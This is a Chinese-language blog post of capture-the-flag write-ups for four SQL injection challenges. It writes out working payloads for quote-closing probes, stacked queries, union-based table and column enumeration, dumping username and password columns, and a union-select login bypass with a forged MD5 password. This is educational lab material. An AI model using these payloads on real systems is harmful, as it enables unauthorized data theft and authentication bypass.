SQL题

已于 2024-04-10 17:01:32 修改
阅读量335 收藏
点赞数
文章标签: 数据库 sql
于 2023-11-16 21:38:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_75005708/article/details/134318861
版权

[极客大挑战 2019]EasySQL

进行简单的尝试,就知道是单引号的字符型注入

5022dd8880b1418c958e1b64fe58c569.png

 万能密码进行一个简单的尝试

结果就出来了

0b905595e8334c1b9ad1940d209c5a35.png

还是要了解一下原理

输入的是1',形成的sql语句是错误的
SELECT*FROM table_name WHERE username='1''and password='123';
第一个单引号和第二个单引号形成了新的闭合,剩余第三个单引号,组成的sql语句不正确,于是语句报错,页面就会出现错误。

[SUCTF 2019]EasySQL

当我们输入非零数字的时候,页面上有回显,用0也是什么都没有,字母也是什么都没有

我们就直接尝试一下命令

1;show databases;

e88245dd4010401a81fd5aea58e9036e.png

1;show tables;  发现一个表为flag

5405c356126b4f149bfd17e06a60824e.png

 猜答案应该就会在flag表中,那么就可以查一下看看

1;show columns from Flag   (1;show columns from用来查询表中列名称)

8f4b4a1a0d4f44d0b30af5e589fe4c92.png

没有回显,应该是flag也是被过滤了,想了一下,其实在查询的数据库的时候就应该要发现是堆叠注入,自己对堆叠注入还是不了解,刚刚没有看出来。

修改sql_mode的值,将||视为字符串的连接操作符而或非运算符,即set sql_mode=PIPES_AS_CONCAT;

也就是堆叠注入下可以改变sql的||符号的作用,就让||实现连接的功能

|| 变成类似 concat() 函数

看看后台的查询语句

$sql = "select ".$post['query']."||flag from Flag";

区别

在MySQL中,操作符||表示“或”逻辑     也就是只要有一个为真就可以为真了。

mssql中||表示连接操作符,不表示或的逻辑

union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union或者 union all 执行的语句类型是有限的,可以用来执行查询语句,例如查库,表之类的,而堆叠注入可以执行的是任意的语句,将多条语句进行执行,;代表一条语句的结束。

payload

1;set sql_mode=pipes_as_concat;select 1

d872c1bb5b4946bcb22d9b21a58892e4.png

非预期

尝试之后就会发现没有过滤*

payload: *,1
查询flag
拼接之后的语句为
select *,1 || flag from flag

先查找全部,再去查找1

最后也是可以拿到结果的

[极客大挑战 2019]LoveSQL

尝试一下万能密码

7072d87d60f344d5b071def2ac1e2962.png

 看看回显位置

1' union select 1,2,3#

发现是在2和3 回显

字段

1'order by 4#

9ff68c1dedf541259ca86f84563b1a08.png

只有三个字段

数据库

1' union select 1,database(),version()#

46684751172a4762b1ccc4fb109e722f.png

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

 59d00398e7ae4fffa7b9c4c641edf633.png

 发现有二张表

geekuser
l0ve1ysq1

先看第一个

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#

f02fe9590d094b768fb01fe9b061b065.png

下一个也是一样的

也是先读取第一张表的内容

1' union select 1,2,group_concat(id,username,password) from geekuser#

 f05b6ae387784a3c8e7fd3d336e03c71.png

 下一张表的内容

1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

 636a8aa86a484d099a8959c0bad4aee9.png

 发现这一张表的内容有许多,在后面就会发现答案。

[GXYCTF2019]BabySQli

f2fa0474bff1491c91bb7f6f5910a57e.png

 看看源代码

131562f14ca348fab6e7c1db555bc888.png

 base32后base64

base32 只有大写字母和数字数字组成,或者后面有三个等号。
base64 只有大写字母和数字,小写字母组成,后面一般是两个等号

235d85922bee412eafbf09e0a6178b9f.png

 到这里就暂时没有思路了

先看看列数

1' order by 1,2,3#

是不是被过滤了,大写看看

e61e44b74bd044728a20295c51d7a05d.png

 就知道有三列,并且还过滤了order

回显位置

1' union select 1,2,3#

aead85b818f1430db1d3c85889204711.png

 利用sqli的特性:在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。

eg

select * from user where username = 'wxs' union select 1,'admin','123456';

 临时创建了一个admin用户,密码是123456

那就可以随便构建一个密码

123456

MD5  e10adc3949ba59abbe56e057f20f883e

payload

1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'#&pw=123456

e9c1ee56920a4594aed79415f1b99c20.png

 3271018e25274145a37c517176adbba1.png

 数据库会将123456的MD5值与里面的相比较,如果匹配成功,就会返回flag

芝诺的乌龟M
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql
lbt924905046的博客
12-18 3743
选择 1.删除表中数据的语句是( d )。 A. DROP B. ALTER C. UPDATE D. DELETE 2.限制输入到列的值的范围,应使用( d )约束。 A. CHECK B. PRIMARY KEY C. FO...
SQL经典50
纸上得来终觉浅,绝知此事要躬行
07-07 1万+
SQL经典50参考自B站视频
sql
m0_64071735的博客
10-18 5923
帮助读者理解sql
每天一道大厂SQL【Day11】微众银行真实战(一)
Maynor的博客
02-20 4182
大家好,我是Maynor。相信大家和我一样,都有一个大厂梦,作为一名资深大数据选手,深知SQL重要性,接下来我准备用100天时间,基于大数据岗面试中的经典SQL,以每日1的形式,带你过一遍热门SQL并给出恰如其分的解答。一路走来,随着问加深,发现不会的也愈来愈多。但底气着实足了不少,相信不少朋友和我一样,日积月累才是最有效的学习方式!
268道,强烈推荐最强SQL库(附习讲解)
数据分析与统计学之美
05-10 2208
268道,强烈推荐最强SQL库(附习讲解)
sql一(空位连续座位买票)
qq_42765393的博客
06-28 2218
目: 所需文件 ROWID(座位排号)、SEAT(座位编号)、STATUS(状态) 目要求 4 个人一起去看电影,准备预订电影票横向坐一起,从这么多排座位中,找出连续 4个空位的全部组合,结果输出座位组合情况,例 (1~4 6~9) 思考一下如果是N个人的话应该如何解决,是否有一套通用的查询语句来完成目。...
SQL用到的一些函数
yunweijie_cn的博客
03-22 2926
SQL用到的一些函数前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterw
面试 SQL整理 常见的SQL面试:经典50
热门推荐
sh_c1314
09-13 26万+
目录 ​ SQL基础知识整理: 常见的SQL面试:经典50 三、50道面试 2.汇总统计分组分析 3.复杂查询 sql面试:topN问 4.多表查询 【面试类型总结】这类目属于行列如何互换,解思路如下: 其他面试: SQL基础知识整理: select 查询结果 如:[学号,平均成绩:组函数avg(成绩)]from 从哪张表中查找数...
每天一道大厂SQL【Day03】订单量统计
Maynor的博客
02-02 1374
大家好,我是Maynor。相信大家和我一样,都有一个大厂梦,作为一名资深大数据选手,深知SQL重要性,接下来我准备用100天时间,基于大数据岗面试中的经典SQL,以每日1的形式,带你过一遍热门SQL并给出恰如其分的解答。一路走来,随着问加深,发现不会的也愈来愈多。但底气着实足了不少,相信不少朋友和我一样,日积月累才是最有效的学习方式!
sql练习
zhurigeng的博客
10-11 5710
sql的联系,加强语法学习
2018Sql
04-26
SQL集锦旨在帮助MySQL用户提升SQL技能,涵盖了多种数据查询和分析的场景。下面将对目中的几个关键知识点进行详细解析。 1. 统计不同客户类型对应的客户数量并排序: 这个问主要涉及到`JOIN`、`GROUP BY`和...
sqlsql(无答案
01-02
sql(无答案),分类居然没得选。。。 SQL数据库管理与开发试(C卷) SQL数据库管理与开发试(D卷) SQL数据库管理与开发试(E卷) SQL数据库管理与开发试(F卷) SQL数据库管理与开发试(G卷) SQL数据库管理...
SQL答案.docx
12-03
判断部分测试了对SQL语法规则的理解,例如第2和第3可能是关于SQL的基本语法是正确的,而第4和第5可能是关于某些特殊情况或错误的SQL语句。第21T可能是关于SQL能处理复杂查询的陈述,而第24T可能强调了...
数据库 SQL SQL大全内含完整习整理,有答案
01-10
最后,Oracle数据库复习整理.doc可能包含了关于Oracle特定的SQL特性,如PL/SQL(Oracle的编程语言扩展)、触发器(Trigger)、索引(Index)、分区(Partitioning)和事务管理(Transaction Management)等内容。...
SQL.rar_sql_sql
09-14
本压缩包“SQL.rar”包含了一份“SQL.sql”习集,旨在帮助用户深入理解和熟练掌握SQL的各种操作。下面我们将详细探讨SQL的基本概念、主要功能以及习可能涉及的知识点。 1. **SQL简介**: SQL是1970年代由IBM的...
Redis集群和高可用
xiaogengtongxu的博客
07-13 613
主从架构无法实现master和slave角色的自动切换,即当master出现redis服务异常、主机断电、磁盘损坏等问导致master无法使用,而redis主从复制无法实现自动的故障转移(将slave 自动提升为新master),需要手动修改环境配置,才能切换到slave redis服务器,另外当单台Redis服务器性能无法满足业务写入需求的时候,也无法横向扩展Redis服务的并行写入性能。master和slave角色的无缝切换,让业务无感知从而不影响业务使用。
【星海随笔】vCenter Server 和主机管理。
最新发布
weixin_41997073的博客
07-16 156
1.方法:删除页面信息,然后断连这个受管主机,断开受管主机的连接不会将其从 vCenter Server 中移除,而只是临时挂起 vCenter Server 执行的所有监控活动。2.方法:在分布式存储中找到该虚拟设备的存储盘,文件里找到相关的vmdk磁盘文件,点击注册虚拟机。当资料不匹配时候,可以删除展示页面,孤立的设备的 匹配位置的信息。断开后,然后重新连接,既可以重新识别受监管的主机。数据库在Vserver中展示的是一个数据库的资料,应该是client的资料。1.确定为资料不匹配导致的展示问
Redis数据结构-String篇
时间如瑾 代码如诗
07-12 914
对⼀个内部表示成long型的string执行append, setbit, getrange这些命令,针对的仍然是string的值(即⼗进制表示的字符串),而不是针对内部表⽰的long型进⾏操作。因此,在这些命令的实现中,会把long型先转成字符串再进行相应的操作。String 的内部存储结构⼀般是 sds(Simple Dynamic String,可以动态扩展内存),但是如果⼀个String 类型的 value 的值是数字,那么 Redis 内部会把它转成 long 类型来存储,从⽽减少内存的使用。
docker-compose安装PolarDB-PG数据库
wnfff的博客
07-12 317
docker-compose安装PolarDB-PG数据库
hive sql
09-03
- *1* [大厂面试汇总-HiveSQL篇(持续更行中……)](https://blog.csdn.net/thenowaiting/article/details/129471886)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值